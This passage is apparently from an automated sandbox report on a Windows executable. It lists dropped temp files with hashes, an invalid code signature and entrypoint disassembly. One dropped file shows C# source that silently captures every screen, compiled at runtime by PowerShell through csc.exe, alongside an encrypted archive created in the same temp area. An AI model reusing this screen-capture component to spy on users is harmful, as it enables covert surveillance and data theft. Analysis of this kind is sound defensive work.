                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3n2yb0v.1q2.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnkawxoe.key.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzbdsccl.kfl.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvtfd2xb.pdg.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\aaDHy.zip

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe
                                                                                                                                                                                                                                                                  File Type:RAR archive data, v5
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):753950
                                                                                                                                                                                                                                                                  Entropy (8bit):7.999747563986138
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:12288:WQ49LgOWrjoBxrFWtWEc877AbInF/Z6BdtZRiFF/Y75tvlP4LAubkn9r1YNYiwyw:WQYWr0BBFgvrr6rtZgTQtttsbk9r1YNa
                                                                                                                                                                                                                                                                  MD5:D6C8AE175D1193CF0E37896716F47496
                                                                                                                                                                                                                                                                  SHA1:DCB6990AFB099DAA73AAEB8B4EB1B45708CA4EA9
                                                                                                                                                                                                                                                                  SHA-256:1CA19D281A279BD4F028E80041495F6AC2CA3E1DF61C348FD2BC42630F062505
                                                                                                                                                                                                                                                                  SHA-512:666AA92AE84956F6F8DDE773C08E8B1A7C5526D1CADFD9B470605B55E349347A001703660AC6C45B72D8AF16C992C81870A29FB7E4DB5BAC37A15953B7237B8D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:Rar!.......{!.......".IE.<=\.....AC.@..#..V....<....)Ia ....:m..^...s.C..^4.F..A&c.{.sCp....}.. ?....N....^.<.$.>P.........r.....ZI....~..H...Ne.....?[..3S.Mt..L.zC.P.Rt.`..K.!..7PX...c....pG..@.....V....FWZeJ.&|uU..l.{...M.>..........!.2@.)|.$..n.=..u.g..i...e%..XH.{.7~...L..f.....z..Y...v.MX.....(..W.~...w..$<.....z..{..3....1+FkZ.......-.s.%9.J..J. .$.i.....pQ....:..1x..m..>m\Y..2....A.....909..A.@}G..?....:...jg...mtL.#")..e..C.SL.Z...Ku.*.q......V....A..$...W..@j)..B.......G....8..X}.X..s..M..3?._.|.F.C.B.8}u..:..E...... .x......;t}..!.-.^...9."o...DdB....3(..5I>......|...'>..O/(.#.samq~....'.......Of{ 4Ju........e.SQ...Y.z.l..s..........@bB.....<..M/.c.|]..."0.a..;}C.U.Bv.YB..sZ.w..I.....k......DCu....XWJ1......)...b2..i`].T...SP.YQJ..E..GT.K...2t.*.o....aCn.U|.S....A......B.'..Jh.n<i............7.6p._Kx.dm^....D.s.....Y.....&......Vv.4.ln..%d...T.[.?W%P....r..!.4^.B0.YF..R,dMk.r.....52.:q9..-........[......!.%..q4=.E.|.'.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):652
                                                                                                                                                                                                                                                                  Entropy (8bit):3.095667326219972
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryHak7YnqqjPN5Dlq5J:+RI+ycuZhNVakSjPNnqX
                                                                                                                                                                                                                                                                  MD5:263AED78BB50ADC8E5B7E45BA8FE77F5
                                                                                                                                                                                                                                                                  SHA1:DA73CD746174C8117F64006DD37D7BE3D72CEB9C
                                                                                                                                                                                                                                                                  SHA-256:A39BACA57747173779F3E67F392B78EFC49F101153FB0F2EFD06ABBB0AAD4317
                                                                                                                                                                                                                                                                  SHA-512:3AE9DA7C07304C5DBF67F1B6235E76A47EB1BA06BFDB43C113C7F99BADCBBDD65DF1F82AB84B2F8D7B1848080D5A8AB61DD4ED753D7FE468CDC17CF698D95F16
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.e.x.z.y.3.0.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.e.x.z.y.3.0.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.0.cs

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1004
                                                                                                                                                                                                                                                                  Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                                                  MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                                                  SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                                                  SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                                                  SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (612), with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):615
                                                                                                                                                                                                                                                                  Entropy (8bit):5.335836085523955
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5cNwiF:p37Lvkmb6KOkqe1xBkrk+ikNZuWZEJZj
                                                                                                                                                                                                                                                                  MD5:DF216C58F21FA0AE3786E2A894865D33
                                                                                                                                                                                                                                                                  SHA1:CCB5F483649C5782CC0C273BBB30EDDC63701788
                                                                                                                                                                                                                                                                  SHA-256:A2681B0CF5ACCC07522F9CFB543B6A7C5797E25AA5F382E9593814D3F526160F
                                                                                                                                                                                                                                                                  SHA-512:37398B1F49D67A688DBA49E8EBB435F3CCC7754CAD0F4A253545C5A18B63F073275165329716394AA97288B4DBA254C3FA8DFE5CA1DDF4AD4B8A83C9A999C1CC
                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.0.cs"

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.dll

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4096
                                                                                                                                                                                                                                                                  Entropy (8bit):3.154588496996072
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:6i7oEAtf0KhzBU/7f6mtJQN0BpW1ulVa3Jq:iNz0emoOBXK
                                                                                                                                                                                                                                                                  MD5:AC10229EEE2013E39C1F19B3CD433E97
                                                                                                                                                                                                                                                                  SHA1:86C8C1E86785652BBB1795FBBBE0F0F9CF4B30F1
                                                                                                                                                                                                                                                                  SHA-256:6E6D788355DBA5CB71110FDFE93B11AD12F552A91664208981BA836678695292
                                                                                                                                                                                                                                                                  SHA-512:204991AE3BA9E1AEB095DA1BA9DE7B4F27B4C28B4DEBFE970B402210B3876FBE48CB24003E01B72A227C532EADE78E441B0F382D3B671DC1E56B5A7460554386
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a6zg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.out

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (720), with CRLF, CR line terminators
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):1159
                                                                                                                                                                                                                                                                  Entropy (8bit):5.4998803639954685
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:KoNId3ka6KOkqeFkrvEvCKax5DqBVKVrdFAMBJTH:vNkka6NkqeFkrvEvCK2DcVKdBJj
                                                                                                                                                                                                                                                                  MD5:46089DB77D2615AD244A2DE94014A49D
                                                                                                                                                                                                                                                                  SHA1:133FAA07F61C613B29E43DCA0046CEEFB0F4B7EC
                                                                                                                                                                                                                                                                  SHA-256:93EF32D700F5D221A80F11670E53F3426CB59D4BF63F541768F4C4EE0948D633
                                                                                                                                                                                                                                                                  SHA-512:93B0096477CCB3229DCC03A3C2C1C4269E8CFCB9EA0584D8EE4DACD04A7329CD9CD46302D10A02306CE2DFF2C606642A35881BC458E44DA14E292D0308D0D070
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which i

                                                                                                                                                                                                                                                                  \Device\ConDrv

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                                                                  Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                                                  MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                                                  SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                                                  SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                                                  SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

                                                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Entropy (8bit):7.99330670836274
                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                  File name:X9g8L63QGs.exe
                                                                                                                                                                                                                                                                  File size:7'849'526 bytes
                                                                                                                                                                                                                                                                  MD5:17e85e39754db87356121c00e17d3096
                                                                                                                                                                                                                                                                  SHA1:ab01140ebc61d625989f842eb2db9bdc79c15444
                                                                                                                                                                                                                                                                  SHA256:006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4
                                                                                                                                                                                                                                                                  SHA512:40e90e9148f1442b9a74d6f31febf0aa6a9d1e7761e6b7d2b2f340f6ece456386ae5abd991ca5c09fd610e0947357f677ce24756e0b906a26be8dd74f2914a3a
                                                                                                                                                                                                                                                                  SSDEEP:196608:HsunqZzwfI9jUC2XMvH8zPjweaBpZ0cX2ooccXK7oSr:/BIH2XgHq+jq93Yoa
                                                                                                                                                                                                                                                                  TLSH:DC863349679244F4FA379A3DD1539A1AD3F338A50760DB9B03A8A2760D734F11C3EB62
                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..

                                                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                                                  Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Entrypoint:0x14000ce20
                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                  Time Stamp:0x6755E76E [Sun Dec 8 18:37:34 2024 UTC]
                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                  Import Hash:72c4e339b7af8ab1ed2eb3821c98713a

                                                                                                                                                                                                                                                                  Authenticode Signature

                                                                                                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                                                                                                  Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                                                                                                  • 29/09/2021 02:00:00 29/09/2024 01:59:59
                                                                                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                                                                                  • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                                                                                  Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                                                                                                                  Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                                                                                                                  Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                                                                                                                  Serial:00BFB15001BBF592D4962A7797EA736FA3

                                                                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  sub esp, 28h
                                                                                                                                                                                                                                                                  call 00007FC6C0D3E8BCh
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  add esp, 28h
                                                                                                                                                                                                                                                                  jmp 00007FC6C0D3E4DFh
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  sub esp, 28h
                                                                                                                                                                                                                                                                  call 00007FC6C0D3EC88h
                                                                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                                                                  je 00007FC6C0D3E683h
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                                  jmp 00007FC6C0D3E667h
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  cmp ecx, eax
                                                                                                                                                                                                                                                                  je 00007FC6C0D3E676h
                                                                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  cmpxchg dword ptr [0003570Ch], ecx
                                                                                                                                                                                                                                                                  jne 00007FC6C0D3E650h
                                                                                                                                                                                                                                                                  xor al, al
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  add esp, 28h
                                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                                  mov al, 01h
                                                                                                                                                                                                                                                                  jmp 00007FC6C0D3E659h
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  sub esp, 28h
                                                                                                                                                                                                                                                                  test ecx, ecx
                                                                                                                                                                                                                                                                  jne 00007FC6C0D3E669h
                                                                                                                                                                                                                                                                  mov byte ptr [000356F5h], 00000001h
                                                                                                                                                                                                                                                                  call 00007FC6C0D3DDB5h
                                                                                                                                                                                                                                                                  call 00007FC6C0D3F0A0h
                                                                                                                                                                                                                                                                  test al, al
                                                                                                                                                                                                                                                                  jne 00007FC6C0D3E666h
                                                                                                                                                                                                                                                                  xor al, al
                                                                                                                                                                                                                                                                  jmp 00007FC6C0D3E676h
                                                                                                                                                                                                                                                                  call 00007FC6C0D4BBBFh
                                                                                                                                                                                                                                                                  test al, al
                                                                                                                                                                                                                                                                  jne 00007FC6C0D3E66Bh
                                                                                                                                                                                                                                                                  xor ecx, ecx
                                                                                                                                                                                                                                                                  call 00007FC6C0D3F0B0h
                                                                                                                                                                                                                                                                  jmp 00007FC6C0D3E64Ch
                                                                                                                                                                                                                                                                  mov al, 01h
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  add esp, 28h
                                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  inc eax
                                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  sub esp, 20h
                                                                                                                                                                                                                                                                  cmp byte ptr [000356BCh], 00000000h
                                                                                                                                                                                                                                                                  mov ebx, ecx
                                                                                                                                                                                                                                                                  jne 00007FC6C0D3E6C9h
                                                                                                                                                                                                                                                                  cmp ecx, 01h
                                                                                                                                                                                                                                                                  jnbe 00007FC6C0D3E6CCh
                                                                                                                                                                                                                                                                  call 00007FC6C0D3EBFEh
                                                                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                                                                  je 00007FC6C0D3E68Ah
                                                                                                                                                                                                                                                                  test ebx, ebx
                                                                                                                                                                                                                                                                  jne 00007FC6C0D3E686h
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  lea ecx, dword ptr [000356A6h]
                                                                                                                                                                                                                                                                  call 00007FC6C0D4B9B2h

                                                                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca340x78.rdata
